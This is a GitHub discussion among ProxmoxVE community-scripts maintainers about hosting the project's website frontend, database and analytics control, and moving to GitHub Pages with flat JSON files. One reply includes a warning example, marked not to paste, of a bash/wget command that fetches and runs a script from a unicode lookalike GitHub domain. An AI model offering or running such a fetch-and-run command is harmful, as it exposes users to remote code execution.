### DISCUSSION TITLE
Frontend shenanigans? Decisions needed!

### DISCUSSION THREAD

**Discussion by tteck** [community-scripts/ProxmoxVE#45] [General]
Can someone explain why the frontend is directed to `https://community-scripts.github.io/Proxmox/` instead of `https://community-scripts.github.io/ProxmoxVE/`? Is there a specific reason for this change, aside from the _obvious_?

**Comment by tteck** [comment]
Who owns `https://github.com/community-scripts/Proxmox/`? Now they can hold the frontend hostage to `https://github.com/community-scripts/ProxmoxVE` What a way to start.

**Reply by bramsuurdje** [reply]
the organization "community-scripts" owns that URL. who are you referring to as "they"?

**Reply by tteck** [reply]
I see that now. How many have control of the DB, Umami ect..?

**Reply by bramsuurdje** [reply]
just me for now, havent found way to get in contact with anyone to share logins. is it possible to create a group somewhere where we can discuss things?

**Reply by tteck** [reply]
Discord is the easiest way.

**Comment by bramsuurdje** [comment]
Unless you are suggesting that this repository should become a mono-repo where the scripts and the site live in the same place. we have no way to put the site on ProxmoxVE. since the repository for the scripts is already under ProxmoxVE.

**Reply by tteck** [reply]
`https://community-scripts.github.io/ProxmoxVE/master` when built, it would create a gh-pages folder.

**Reply by newzealandpaul** [reply]
I think this makes sense to have the gh-pages on one url. It is a little confusing. 

I think it also makes sense to primarily use gh-pages not a third party domain, which was once tried and didn't work out. The reason for this is domains can be hijacked etc.

**Reply by tteck** [reply]
I wanted to discuss the current status of the domain https://Helper-Scripts.com/, which is currently set up as a redirect. I chose this recognizable domain to make it easier for users to find our resources. However, if the "community" prefers not to use it, I’m open to redirecting it back to my original site.

**Reply by tteck** [reply]
>  think this makes sense to have the gh-pages on one url. It is a little confusing.

I too agree with this.

I also think the website landing page should explain the community-scripts story. This will help familiarize users and establish trust in the current path. Otherwise, we may see many forks falsely claiming to be endorsed by tteck.

**Comment by havardthom** [comment]
What do people feel about having a `/docs` folder in this repo which contains source code for frontend? and additionally having a folder that contains one JSON file per script for documentation, either on root level or in `docs`  source code. (I scraped tteck's site this weekend to generate json file for each script, but it needs a lot of grooming)

**Reply by tteck** [reply]
The website source code _should_ be stored in `master` and when built, would be `gh-pages` directory, this is the standard way.

**Reply by havardthom** [reply]
Since the documentation is tightly coupled with scripts I think it makes sense to have a `docs` folder with the source code. Having two branches `main` and `master` is not very intuitive to me, you have to go on a hunt to find the frontend code. A github action can build and commit static files to `gh-pages` branch when there are changes in `docs` folder.

**Reply by tteck** [reply]
Currently, it's using a PocketBase DB. My old site used the flat file approach. Are you on the website committee? Is there a  website committee?

**Reply by newzealandpaul** [reply]
I really like the idea of having a /docs folder containing the source code for the website, with a github action to build it. 

How about inside /ct we have a json file accompanying actualbudget.sh and actualbudget.json.

I am not mad about using an external database that could be compromised. For example nobody might notice if this is the URL they copied and pasted from a compromised website with subtle unicode modifications:

```
# DO NOT PASTE INTO YOUR TERMINAL
bash -c "$(wget -qLO - https://gìthub.com/tteck/Proxmox/raw/main/ct/homeassistant.sh)"
```

**Reply by tteck** [reply]
I think the current approach (created by @BramSuurdje) would work great if:

1. It relies only on GitHub (https://github.com/community-scripts/ProxmoxVE), without needing PocketBase, Vercel, server-side, etc.
2. Umami stats are publicly visible.
3. Only a select few have permission to make changes (currently just one person), with all other requests managed through pull requests. This would require forking to https://community-scripts.github.io/ProxmoxVE/master.

If these concessions can't be made, I'd suggest putting out some feelers to find someone who can. A website is a necessity!!

**Reply by newzealandpaul** [reply]
> Currently, it's using a PocketBase DB. My old site used the flat file approach. Are you on the website committee? Is there a website committee?

I am not sure there is a website committee. I created a private website channel on discord https://discord.gg/NvYz4A6u if anyone wants to chat about it.

**Comment by tteck** [comment]
I see no movement on this issue. Why?

**Reply by bramsuurdje** [reply]
i like the idea of a mono-repo for everything. but how about we create e.g. a “www” folder or a “website” folder where all the frontend code lives. imho having a branch for a website is unintuitive and just makes it confusing for other people

**Reply by tteck** [reply]
Give it a try, lets see it in action.

**Reply by tteck** [reply]
@BramSuurdje Any movement toward our goal? what about making this happen, website stats are publicly available at the following URL:???????? Can we at least see our own stats? @havardthom

**Reply by newzealandpaul** [reply]
@BramSuurdje has gone to bed, but yes lots of movement. 

All contributors have not been communicating on discord. We are working well as a team.

The consensus was to move the frontend code to /frontend in the ProxmoxVE repo. Here is the PR:

https://github.com/community-scripts/ProxmoxVE/pull/63/commits

The site will be hosted on github pages and be built dynamically.

I am working on converting the pocketdb to flat json files which will probably live at /json

With regards to stats. I think there is probably a way to query the analytics software and upload static stats, maybe once per day.

I will message you on discord regarding viewing stats.

**Reply by newzealandpaul** [reply]
@tteck I am quite proud of this team. All coming together to ensure your vision lasts well into the future :)
